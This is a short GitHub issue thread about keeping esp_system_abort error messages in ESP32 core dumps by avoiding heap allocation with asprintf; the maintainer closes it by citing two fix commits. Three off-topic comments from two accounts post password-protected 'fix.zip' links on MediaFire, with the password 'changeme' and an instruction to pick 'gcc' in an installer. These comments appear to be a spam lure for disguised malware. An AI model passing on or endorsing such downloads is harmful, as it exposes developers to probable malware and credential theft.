### ISSUE TITLE
Don't use asprintf in esp_system_abort.

### ISSUE THREAD

**Issue by rtrbt** [Tinkerforge/esp32-firmware#364]
The error message will not be contained in the core dump if it is heap-allocated!

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by 2302114245** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by rtrbt** [comment]
Fixed with 30f84fe, 829659d
